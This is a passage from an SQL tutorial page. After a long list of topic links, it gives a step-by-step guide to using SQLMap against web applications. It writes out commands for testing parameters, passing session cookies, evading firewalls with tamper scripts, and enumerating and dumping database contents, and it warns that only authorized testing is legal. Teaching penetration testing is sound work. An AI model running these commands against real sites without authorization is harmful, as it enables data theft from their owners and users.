SQL Tutorial

• SQL | Datatypes
• SQL | DDL, DML, TCL and DCL
• SQL | TRANSACTIONS
• SQL | VIEWS
• SQL | Comments
• SQL | Constraints
• SQL | Creating Roles
• SQL | Indexes
• SQL | SEQUENCES
• SQL | Query Processing
• CTE in SQL
• SQL Trigger | Student Database
• Book Management Database
• Introduction to NoSQL

SQL Clauses / Operators

• SQL | WITH clause
• SQL | With Ties Clause
• SQL | Arithmetic Operators
• SQL | Wildcard operators
• SQL | Intersect & Except clause
• SQL | USING Clause
• SQL | MERGE Statement
• MERGE Statement in SQL Explained
• SQL | DDL, DML, DCL and TCL Commands
• SQL | CREATE DOMAIN
• SQL | DESCRIBE Statement
• SQL | Case Statement
• SQL | UNIQUE Constraint
• SQL | Create Table Extension
• SQL | ALTER (RENAME)
• SQL | ALTER (ADD, DROP, MODIFY)
• SQL | LIMIT Clause
• SQL | INSERT IGNORE Statement
• SQL | LIKE
• SQL | SOME
• SQL | OFFSET-FETCH Clause
• SQL | Except Clause
• Combining aggregate and non-aggregate values in SQL using Joins and Over clause
• SQL | ALL and ANY
• SQL | EXISTS
• SQL | GROUP BY
• SQL | Union Clause
• SQL | Aliases
• SQL | ORDER BY
• SQL | SELECT TOP Clause
• SQL | UPDATE Statement
• SQL | DELETE Statement
• SQL | INSERT INTO Statement
• SQL | AND and OR operators
• SQL | WHERE Clause
• SQL | Distinct Clause
• SQL | SELECT Query
• SQL | DROP, TRUNCATE
• SQL | CREATE
• SQL | Join (Cartesian Join & Self Join)
• SQL | Alternative Quote Operator
• SQL | Concatenation Operator
• SQL | MINUS Operator
• SQL | DIVISION
• SQL | NOT Operator
• SQL | BETWEEN & IN Operator
• SQL | Join (Inner, Left, Right and Full Joins)
• SQL | CHECK Constraint

SQL-Injection

• SQL Injection
• How to use SQLMAP to test a website for SQL Injection vulnerability
• Mitigation of SQL Injection Attack using Prepared Statements (Parameterized Queries)
• Basic SQL Injection and Mitigation with Example

SQL Functions

• SQL | Mathematical functions (SQRT, PI, SQUARE, ROUND, CEILING & FLOOR)
• SQL | Conversion Function
• SQL general functions | NVL, NVL2, DECODE, COALESCE, NULLIF, LNNVL and NANVL
• SQL | Conditional Expressions
• SQL | Character Functions with Examples
• SQL | LISTAGG
• SQL | Aggregate functions
• SQL | Functions (Aggregate and Scalar Functions)
• SQL | Date functions
• SQL | NULL
• SQL | Numeric Functions
• SQL | String functions
• SQL | Advanced Functions

SQL Queries

• SQL | Joining three or more tables
• SQL | How to Get the names of the table
• SQL | Sub queries in From Clause
• SQL | Correlated Subqueries
• SQL | Top-N Queries
• SQL | SUB Queries
• SQL | How to print duplicate rows in a table?
• SQL | How to find Nth highest salary from a table
• DBMS | Nested Queries in SQL
• SQL query to find second highest salary?

PL/SQL

• PL/SQL Introduction
• Cursors in PL/SQL
• Sum Of Two Numbers in PL/SQL
• Reverse a number in PL/SQL
• Factorial of a number in PL/SQL
• Print Patterns in PL/SQL
• Decision Making in PL/SQL
• Oracle SQL | Pseudocolumn
• SQL | Procedures in PL/SQL
• Print different star patterns in SQL
• GCD of two numbers in PL/SQL
• Centered triangular number in PL/SQL
• Floyd’s triangle in PL/SQL
• Convert distance from km to meters and centimeters in PL/SQL
• Convert the given numbers into words in Pl/SQL
• Sum of digits of a number in PL/ SQL
• Sum of digits equal to a given number in PL/SQL
• Sum and average of three numbers in PL/SQL
• Check whether a string is palindrome or not in PL/SQL
• Count odd and even digits in a number in PL/SQL
• No. of vowels and consonants in a given string in PL/SQL
• Area and Perimeter of a circle in PL/SQL
• Finding sum of first n natural numbers in PL/SQL
• Area and Perimeter of Rectangle in PL/SQL
• Sum of the first and last digit of a number in PL/SQL
• Count no. of characters and words in a string in PL/SQL
• Greatest number among three given numbers in PL/SQL
• Concatenation of strings in PL/SQL
• PL/SQL | User Input

MySQL

• MySQL | Regular expressions(Regexp)
• MySQL | Grant/Revoke Privileges
• MySQL | DATABASE() and CURRENT_USER() Functions
• MySQL | BIN() Function
• MySQL | IFNULL
• MySQL | LAST_DAY() Function
• MySQL | RENAME USER
• MySQL | DROP USER
• MySQL | CREATE USER Statement
• MySQL | Change User Password
• PHP | MySQL WHERE Clause
• PHP | MySQL ORDER BY Clause
• PHP | MySQL UPDATE Query
• PHP | MySQL Delete Query
• PHP | MySQL LIMIT Clause
• PHP | MySQL Select Query
• PHP | Inserting into MySQL database
• PHP | MySQL ( Creating Table )
• PHP | MySQL ( Creating Database )

SQL Server

• SQL SERVER | Conditional Statements
• SQL Server Identity
• SQL Server | STUFF() Function

Misc

• SQL using Python
• SQL using Python and SQLite
• SQL using Python (Handling large data)
• Check if Table, View, Trigger, etc present in Oracle
• Performing Database Operations in Java | SQL CREATE, INSERT, UPDATE, DELETE and SELECT
• Difference between Simple and Complex View in SQL
• Difference between Static and Dynamic SQL
• Having Vs Where Clause?
• Inner Join Vs Outer Join
• Difference between SQL and NoSQL

How to use SQLMAP to test a website for SQL Injection vulnerability

SQLMap is a powerful tool for detecting and exploiting SQL injection vulnerabilities in web applications. Here's a basic guide on how to use SQLMap to test a website for SQL injection vulnerabilities:

1. Installation: Ensure that you have Python installed on your system. Then, you can clone the sqlmap repository from GitHub.

   git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
   

2. Basic Usage: To test a website, you'll typically supply the vulnerable URL parameter to SQLMap.

   python sqlmap.py -u "http://example.com/page.php?id=1"
   

3. POST Requests: If the vulnerable parameter is sent through a POST request, you can capture the request using tools like Burp Suite or Fiddler and save it to a text file. You can then point SQLMap to this file.

   python sqlmap.py -r request.txt
   

4. Cookies: If the website relies on cookies (for instance, if you're authenticated), you can provide them to SQLMap.

   python sqlmap.py -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=abc123; security=low"
   

5. Tamper Scripts: SQLMap includes tamper scripts that can help bypass web application firewalls and other protections.

   python sqlmap.py -u "http://example.com/page.php?id=1" --tamper=space2comment
   

6. Database Enumeration: Once you've confirmed an SQL injection vulnerability, you can use SQLMap to enumerate database information.

   # Get database names
   python sqlmap.py -u "http://example.com/page.php?id=1" --dbs
   
   # Get tables from a specific database
   python sqlmap.py -u "http://example.com/page.php?id=1" -D target_database --tables
   
   # Get columns from a specific table
   python sqlmap.py -u "http://example.com/page.php?id=1" -D target_database -T target_table --columns
   
   # Dump data from a specific table
   python sqlmap.py -u "http://example.com/page.php?id=1" -D target_database -T target_table --dump
   

7. Other Features: SQLMap has numerous advanced features, such as support for time-based blind, error-based, UNION-based, and stacked query SQL injections. You can also automate tasks, evade detection using various techniques, brute-force passwords, and more. Refer to the official documentation for details.

Important Notes:

• Permission is Key: Only test systems you have explicit permission to test. Unauthorized testing is illegal and unethical.

• False Positives: Just because SQLMap says a parameter is vulnerable does not necessarily mean it is. Always manually verify vulnerabilities.

• Stay Updated: Security tools receive updates that address bugs and add new features. Regularly update your tools to get the best results.

Lastly, while tools like SQLMap are powerful and can automate a lot of tasks, it's crucial to understand the underlying principles of SQL injection and how the tool works. This will make your testing more effective and will help you interpret the tool's output correctly.

1. Install SQLMAP: You can download SQLMAP from its official repository: SQLMAP GitHub.

2. Basic Usage: Run SQLMAP with the target URL to check for SQL injection:

   sqlmap -u "http://example.com/page?id=1"
   

3. SQL Injection Testing on Websites using SQLMAP: SQLMAP automates the process of SQL injection testing. Provide the target URL or parameters, and SQLMAP will analyze and attempt to exploit SQL injection vulnerabilities.

4. Automated SQL Injection Testing with SQLMAP: Use the -u option followed by the target URL to perform automated SQL injection testing:

   sqlmap -u "http://example.com/page?id=1" --batch
   

5. SQL Injection Detection with SQLMAP: SQLMAP automatically detects SQL injection vulnerabilities. Review the output for identified vulnerabilities.

6. SQLMAP Commands for Website Vulnerability Testing:

   • Basic URL testing:

     sqlmap -u "http://example.com/page?id=1"
     

   • Batch mode for automated testing:

     sqlmap -u "http://example.com/page?id=1" --batch
     

   • Specify a parameter vulnerable to SQL injection:

     sqlmap -u "http://example.com/page" --data="id=1"
     

7. SQLMAP Advanced Options for Penetration Testing:

   • Use tamper scripts for evasion:

     sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
     

   • Specify HTTP headers:

     sqlmap -u "http://example.com/page?id=1" --headers="User-Agent: Mozilla/5.0"